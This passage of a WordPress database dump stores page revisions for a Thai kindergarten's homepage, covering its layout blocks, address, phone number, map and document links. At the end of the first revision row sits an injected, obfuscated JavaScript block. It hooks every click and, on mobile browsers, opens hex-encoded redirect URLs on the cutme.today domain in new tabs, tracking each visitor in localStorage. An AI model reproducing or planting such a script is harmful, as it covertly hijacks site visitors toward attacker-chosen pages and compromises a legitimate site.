src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:25:23','2024-08-29 07:25:23','',19,'http://watprato.ssk.in.th/?p=269',0,'revision','',0),
(270,2,'2024-08-29 14:25:56','2024-08-29 07:25:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 